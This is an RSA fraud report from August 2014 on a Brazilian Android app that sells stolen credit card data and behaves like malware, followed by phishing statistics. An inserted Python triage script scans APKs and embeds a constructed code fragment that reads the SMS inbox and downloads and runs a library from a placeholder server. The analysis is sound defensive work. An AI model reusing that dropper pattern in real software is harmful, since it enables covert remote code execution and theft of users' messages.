RSA Online Fraud Report - August 2014
RSA MONTHLY FRAUD REPORT, August 2014

CYBERCRIMINAL IN BRAZIL SHARES MOBILE CREDIT CARD STORE APP

RSA agents recently traced a threat actor advertising a mobile credit card (CC) store application. The cybercriminal shared the information on his Facebook page, including instructions for using the app and links for downloading it. Beyond its obvious purpose of selling compromised credentials, the application also prompts for a set of user permissions at launch that would give it the kind of control over the device usually associated with malicious applications.

RSA's open source investigation revealed a cybercriminal openly advertising a CC store (Figure 1) built as a mobile phone application for Android and iPhone devices (a translation of the post follows).

"Good evening everybody! Today I'll show a project that I've been developing for a while... it's an automated credit card shop application that runs on Android and iOS, using my web credit card store as its database. Remember that I'm the first Brazilian programmer to develop a mobile application that sells credit cards. My clients are increasing day by day and I hope that this new system helps them with their shopping. The Android application is already nearly done and the iOS one is 60% done (tested on a Galaxy S5 and an iPhone 5S; if it doesn't work on your mobile, send me a message with your model and I'll check!). This message is already long so I won't be giving any more details. Below there's the link for my website to download the app and its link on Google Play! Don't forget to install it on your Android, and next week I hope that iOS will get it too!"
AVAILABLE IN THE OPEN MARKET

The application was made available as a free download on Google Play. The cybercriminal provided the following instructions for using the app:

–– Order a batch of CC credentials
–– Enter personal info
–– The app sends bank account details for making a deposit
–– Wait 24 hours to make the transaction
–– Take a photo of the deposit slip as proof and send it to the fraudster
–– Receive the CC credentials by return email

On the CC shop website shared by the fraudster, a link automatically starts downloading the application (Figure 2). Clicking the Android link downloads an Android binary (APK), while the iPhone link displays a message asking the user to wait a week. A sample of screenshots from the app, with relevant translations, follows.

1. Methods of payment: We accept only bank deposits. As soon as you place an order, an order number will appear on the screen together with the rest of your registration info and the total sum to be paid. After you place the order you have 24 hours to make the payment and send the receipt (a photo, a scan, or a digital receipt, to financial@...). Remember that a few cents will be added to the sum to better track the deposit. The client will then receive an email confirmation. We cannot guarantee product availability before the money is in the bank account.

2. Delivery time: After payment confirmation, expect a delay of about 2 hours before the information is sent. When the payment has been recorded by our finance department, the client will receive confirmation via email. Our objective is for your order to be delivered ASAP. Plan your shopping and choose the delivery method that best suits your needs.

3. Information exchange: Offering the best service to our clients, fully guaranteed, is our most important objective. We want you to have the best shopping experience possible, so we accept exchanges or refund your money at no cost.

Buttons: "Agree" / "Disagree".
The order screen shows:

–– Order code
–– Name
–– Email
–– Package: Gold
–– Quantity: 10 units
–– Payment method: Deposit
–– Total value: R$ 700,15 (Brazilian real)
–– Send order

"Your order was successfully sent! Check your email for deposit info. After the deposit, you'll receive a payment confirmation in the CONFIRMATION menu."

ANALYSIS OF THE MOBILE APP

A deeper look into the Android application shows that it has the potential to be used as malware. Upon launching, the app requests a large number of permissions from the user, similar to those commonly seen in mobile malware. Some of the permissions requested include:

–– Read and write Calendar and Contacts
–– Access your location (GPS and network)
–– Call phone numbers
–– Read and write protected and external storage
–– Access your camera and microphone
–– Access the device ID and phone status

After reverse engineering and static code analysis of the application, RSA agents found code indicating that it could be used as malware. The app can download and install new code and applications with additional functions (such as reading SMS, reading SD cards, etc.). Because code loaded this way runs inside the already-installed application, it inherits every permission the user granted at install time: a later update can exercise any of the permissions above without any new prompt to the user.
Additional features revealed in the analysis of the application:

–– Upon opening, the application spams the user with two different advertisement banners.
–– The app has access to external storage, so it can store and install new code in the external memory space.
–– The app uses anti-emulator (anti-SDK) checks, reading the Android OS build properties to determine whether it is running on a physical device or on a virtual machine (a laboratory testing environment).
–– The app reads the country code and network operator code from the SIM card.
–– Upon installation, the app attempts to access the SMS service and read SMS messages.

It is important to note that the CC store source code itself is not contained in the Android binary originally downloaded to the device. Instead, the application updates itself as follows:

–– When launched, the application downloads the necessary library from the fraudster's server. The library contains the code providing the functions needed to make the CC store usable from the user's device.
–– The fraudster can change that code on his side at any time, so the client application picks up a new version on its next launch without the app itself being updated or reinstalled.
–– In some cases, the library is not downloaded even though internet access is available. This is consistent with the app running its anti-emulator check first and fetching the library only when it determines that it is not running on a virtual machine; the same check keeps the downloaded functionality out of an analyst's sandbox, so a static look at the APK alone will not show what the app eventually does.

CONCLUSION

This is one of the first malicious mobile apps developed by Brazilians. The many permission requests at launch may be a sign that the app is also used as malware. Ironically, since cybercriminals are the ones who will use this app to buy CC credentials, they may also be "ripped off" by the developers of the app.
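The permission list and the download-and-load behaviour described above are the two findings an analyst would check together, because code fetched at runtime runs with whatever the manifest already obtained. The script below is an added example, not RSA's tooling and not code from the app: it assumes the APK has been unpacked with apktool (a decoded AndroidManifest.xml) and decompiled to Java-like source, flags the permissions the report lists, greps the source for the loader, emulator-check, SIM-read and SMS patterns, and combines the two into a verdict. The manifest and source fragment embedded in it are constructed samples, not material from the real app; the package name and server URL in them are placeholders.

```python
"""Static triage for the indicators the report describes: over-broad
permissions, dynamic code loading, emulator detection, SIM identity reads
and SMS access. Added example; not RSA's tooling and not the app's code.
Assumes an apktool-decoded AndroidManifest.xml and decompiled source text.
"""
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Permissions the report singles out, keyed to what they let loaded code do.
HIGH_RISK_PERMISSIONS = {
    "android.permission.READ_CALENDAR": "read calendar",
    "android.permission.WRITE_CALENDAR": "write calendar",
    "android.permission.READ_CONTACTS": "read contacts",
    "android.permission.WRITE_CONTACTS": "write contacts",
    "android.permission.ACCESS_FINE_LOCATION": "GPS location",
    "android.permission.ACCESS_COARSE_LOCATION": "network location",
    "android.permission.CALL_PHONE": "place calls",
    "android.permission.WRITE_EXTERNAL_STORAGE": "write external storage",
    "android.permission.CAMERA": "camera",
    "android.permission.RECORD_AUDIO": "microphone",
    "android.permission.READ_PHONE_STATE": "device ID and phone status",
    "android.permission.READ_SMS": "read SMS",
    "android.permission.RECEIVE_SMS": "intercept incoming SMS",
}

# Source patterns for each behaviour the report describes (real Android APIs).
CODE_INDICATORS = {
    "dynamic_code_loading": [r"dalvik\.system\.DexClassLoader", r"new DexClassLoader\("],
    "anti_emulator_check": [r"Build\.FINGERPRINT", r"Build\.HARDWARE", r'"goldfish"', r'"generic"'],
    "sim_identity_read": [r"getSimCountryIso\(", r"getSimOperator\(", r"getNetworkOperator\("],
    "sms_access": [r"content://sms", r"SMS_RECEIVED"],
}


def requested_permissions(manifest_xml):
    """Return the permission names declared in <uses-permission> elements."""
    root = ET.fromstring(manifest_xml)
    return [el.get(ANDROID_NS + "name", "") for el in root.iter("uses-permission")]


def scan_source(source):
    """Map each indicator category to the patterns that matched in the source."""
    hits = {}
    for category, patterns in CODE_INDICATORS.items():
        matched = [p for p in patterns if re.search(p, source)]
        if matched:
            hits[category] = matched
    return hits


def triage(manifest_xml, source):
    """Combine both views: loaded code inherits whatever the manifest granted."""
    perms = requested_permissions(manifest_xml)
    flagged = {p: HIGH_RISK_PERMISSIONS[p] for p in perms if p in HIGH_RISK_PERMISSIONS}
    indicators = scan_source(source)
    if "dynamic_code_loading" in indicators and flagged:
        verdict = ("downloaded code would run with %d high-risk permissions; "
                   "behaviour is decided on the server, not in the APK" % len(flagged))
    elif flagged:
        verdict = "over-privileged for a shop front-end"
    else:
        verdict = "no findings"
    return {"permissions": perms, "flagged": flagged,
            "indicators": indicators, "verdict": verdict}


# Constructed sample manifest (placeholder package name, not the real app's).
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.ccshop">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  <uses-permission android:name="android.permission.CALL_PHONE"/>
  <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
</manifest>
"""

# Constructed decompiled fragment showing the loader pattern the report describes.
SAMPLE_SOURCE = """
if (Build.FINGERPRINT.startsWith("generic") || "goldfish".equals(Build.HARDWARE)) {
    return;  // emulator: stay dormant, never fetch the library
}
String cc = tm.getSimCountryIso();
Cursor c = getContentResolver().query(Uri.parse("content://sms/inbox"), null, null, null, null);
File lib = download(SERVER + "/lib.jar", getExternalFilesDir(null));
DexClassLoader loader = new DexClassLoader(lib.getPath(), optDir.getPath(), null, getClassLoader());
loader.loadClass("shop.Main").getMethod("run").invoke(null);
"""

if __name__ == "__main__":
    for key, value in triage(SAMPLE_MANIFEST, SAMPLE_SOURCE).items():
        print(key, value)
```

The verdict is deliberately driven by the combination rather than by either list alone: a shop front-end asking for the camera is odd, but a shop front-end that also fetches a dex from its operator's server is a remote-controlled dropper, and the emulator check in the sample is why a sandbox run would report nothing.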
Phishing Attacks per Month

RSA identified 42,571 phishing attacks in July, a 25% increase from June. Based on this figure, RSA estimates that phishing cost global organizations $362 million in losses in July.

US Bank Types Attacked

U.S. regional banks have consistently been hit with 30 to 35% of phishing volume over the last few months, i.e. targeted by about one out of every three attacks.

Top Countries by Attack Volume

The U.S. remained the most targeted country in July with 63% of phishing volume. China, the Netherlands, the UK and France were collectively targeted by 20% of total attacks.

[Charts: Phishing Attacks per Month (42,571 attacks); US Bank Types Attacked (credit unions, regional, national); Top Countries by Attack Volume (U.S. 63%; remaining labels Netherlands, UK, China with values 6%, 5%, 4%, pairing not recoverable). Source: RSA Anti-Fraud Command Center, August 2014]
Top Countries by Attacked Brands

Brands in the U.S., UK, Canada, and India were targeted by half of all phishing attacks in July.

Top Hosting Countries

There was a surprising spike in phishing attacks hosted in Hong Kong in July, at 13%, while the U.S. remained the top hosting country at 36% despite a 7% decline from June.

Mobile Transactions and Fraud (Q2 '14)

In Q2, 33% of banking transactions originated in the mobile channel. This marks a 20% increase in mobile traffic from 2013 and a 67% increase from 2012. One out of every four identified fraud transactions was initiated from a mobile device.

[Charts: Top Countries by Attacked Brands (labels U.S., UK; values shown 11%, 29%, 6%, 5%, 2%, pairing not recoverable); Top Hosting Countries (U.S. 36%, Hong Kong 13%); Global Phishing Losses July 2014; Mobile Transactions and Fraud Q2 '14 (33% of transactions, 25% of identified fraud from mobile)]
www.emc.com/rsa

©2014 EMC Corporation. EMC, RSA, the RSA logo, and FraudAction are trademarks or registered trademarks of EMC Corporation in the U.S. and/or other countries. All other trademarks mentioned are the property of their respective holders. AUG RPT 0814